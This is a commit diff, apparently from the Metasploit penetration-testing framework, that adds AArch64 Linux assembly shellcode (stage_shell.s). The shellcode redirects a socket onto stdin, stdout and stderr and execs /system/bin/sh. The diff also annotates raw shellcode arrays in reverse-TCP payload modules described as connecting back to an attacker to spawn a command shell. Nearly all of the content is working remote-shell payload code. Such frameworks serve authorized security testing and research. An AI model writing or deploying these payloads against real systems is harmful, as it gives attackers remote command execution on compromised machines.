add stage_shell.s and cleanup

2017-08-21 14:42:30 +08:00 · 2017-08-21 14:42:30 +08:00 · d6d6c67f33
parent ac6495a7eb
commit d6d6c67f33
4 changed files with 47 additions and 5 deletions
--- a/external/source/shellcode/linux/aarch64/stage_shell.s
+++ b/external/source/shellcode/linux/aarch64/stage_shell.s
@ -0,0 +1,44 @@
+.equ SYS_DUP3, 0x18
+.equ SYS_EXECVE, 0xdd
+.equ SYS_EXIT, 0x5d
+
+.equ STDIN, 0x0
+.equ STDOUT, 0x1
+.equ STDERR, 0x2
+
+_start:
+    /* dup3(sockfd, STDIN, 0) ... */
+    mov    x0, x12
+    mov    x2, 0
+    mov    x1, STDIN
+    mov    x8, SYS_DUP3
+    svc    0
+    mov    x1, STDOUT
+    mov    x8, SYS_DUP3
+    svc    0
+    mov    x1, STDERR
+    mov    x8, SYS_DUP3
+    svc    0
+
+    /* execve('/system/bin/sh', NULL, NULL) */
+    adr    x0, shell
+    mov    x2, 0
+    str    x0, [sp, 0]
+    str    x2, [sp, 8]
+    mov    x1, sp
+    mov    x8, SYS_EXECVE
+    svc    0
+
+exit:
+    mov    x0, 0
+    mov    x8, SYS_EXIT
+    svc    0
+
+.balign 4
+shell:
+.word 0x00000000
+.word 0x00000000
+.word 0x00000000
+.word 0x00000000
+end:
+
--- a/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/aarch64/shell_reverse_tcp.rb
@ -19,11 +19,6 @@ module MetasploitModule
    super(merge_info(info,
      'Name'          => 'Linux Command Shell, Reverse TCP Inline',
      'Description'   => 'Connect back to attacker and spawn a command shell',
-      'Author'        =>
-        [
-          'hyln9', # Virgil Hou
-          'timwr'
-        ],
      'License'       => MSF_LICENSE,
      'Platform'      => 'linux',
      'Arch'          => ARCH_AARCH64,
@ -38,6 +33,7 @@ module MetasploitModule
            },
          'Payload' =>
            [
+            # Generated from external/source/shellcode/linux/aarch64/single_reverse_tcp_shell.s
            0xd2800040,          #  mov	x0, #0x2                   	// #2
            0xd2800021,          #  mov	x1, #0x1                   	// #1
            0xd2800002,          #  mov	x2, #0x0                   	// #0
--- a/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/aarch64/reverse_tcp.rb
@ -38,6 +38,7 @@ module MetasploitModule
            },
          'Payload' =>
          [
+            # Generated from external/source/shellcode/linux/aarch64/stager_sock_reverse.s
            0xd2800040,          #  mov	x0, #0x2                   	// #2
            0xd2800021,          #  mov	x1, #0x1                   	// #1
            0xd2800002,          #  mov	x2, #0x0                   	// #0
--- a/modules/payloads/stages/linux/aarch64/shell.rb
+++ b/modules/payloads/stages/linux/aarch64/shell.rb
@ -22,6 +22,7 @@ module MetasploitModule
        {
          'Payload' =>
          [
+            # Generated from external/source/shellcode/linux/aarch64/stage_shell.s
            0xaa0c03e0,          #  mov	x0, x12
            0xd2800002,          #  mov	x2, #0x0                   	// #0
            0xd2800001,          #  mov	x1, #0x0                   	// #0